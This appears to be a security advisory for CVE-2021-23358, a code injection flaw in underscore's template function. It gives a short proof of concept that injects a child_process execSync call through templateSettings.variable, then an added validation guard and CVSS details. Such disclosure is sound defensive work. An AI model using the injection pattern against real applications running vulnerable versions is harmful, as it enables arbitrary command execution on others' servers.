Arbitrary Code Injection

Affecting org.webjars.npm:underscore artifact, versions [0,1.13.1)


Overview

org.webjars.npm:underscore is a functional programming helper library for JavaScript.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the template function: the variable option read from _.templateSettings is not sanitized before it is used to build the template's render function.

PoC

const _ = require('underscore');
_.templateSettings.variable = "a = this.process.mainModule.require('child_process').execSync('touch HELLO')";
const t = _.template("")();

Remediation

Upgrade org.webjars.npm:underscore to version 1.13.1 or higher.
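Added example (not code from the advisory or from the underscore project): a guard that can sit in front of _.templateSettings or the settings passed to _.template while the upgrade to 1.13.1 is pending. It assumes, as the PoC above relies on, that underscore hands settings.variable to the Function constructor as the render function's parameter list, which is why an assignment placed there is evaluated; the check mirrors the bare-identifier rule the fixed release applies.

```javascript
// Added example, not part of the advisory or of underscore itself.
// Assumption about underscore internals: the renderer is built roughly as
//   new Function(settings.variable || 'obj', '_', source)
// so the whole variable string is parsed as a parameter list, and an
// assignment in it ("a = <expr>") becomes a default-parameter expression
// that runs on every call of the compiled template.

// Only a plain identifier (letters, digits, underscore, $) is acceptable.
const bareIdentifier = /^\s*(\w|\$)+\s*$/;

function isBareIdentifier(name) {
  return typeof name === 'string' && bareIdentifier.test(name);
}

// Returns a validated copy of a template settings object, or throws.
// Use it on _.templateSettings and on per-call settings before _.template
// sees them; an undefined variable falls back to underscore's own default.
function validateTemplateSettings(settings) {
  const copy = Object.assign({}, settings);
  if (copy.variable !== undefined && !isBareIdentifier(copy.variable)) {
    throw new Error('variable is not a bare identifier: ' + copy.variable);
  }
  return copy;
}

// Shows, with a side-effect-free body, that the Function constructor accepts
// an assignment in the parameter slot: this is the gap the guard closes.
function parameterListAccepts(variable) {
  try {
    new Function(variable, '_', 'return 0;');
    return true;
  } catch (e) {
    return false;
  }
}

// Usage sketch: both strings are accepted as a parameter list by the engine,
// but only the bare identifier passes the guard.
const acceptedByEngine = parameterListAccepts('a = 1');      // true
const acceptedByGuard = isBareIdentifier('a = 1');           // false
const normalVariable = isBareIdentifier('data');             // true
```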

CVSS Score

3.3
low severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    Low
  • Integrity
    Low
  • Availability
    None
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C
Credit
Alessio Della Libera (@d3lla)
CVE
CVE-2021-23358
CWE
CWE-94
Snyk ID
SNYK-JAVA-ORGWEBJARSNPM-1081503
Disclosed
02 Mar, 2021
Published
29 Mar, 2021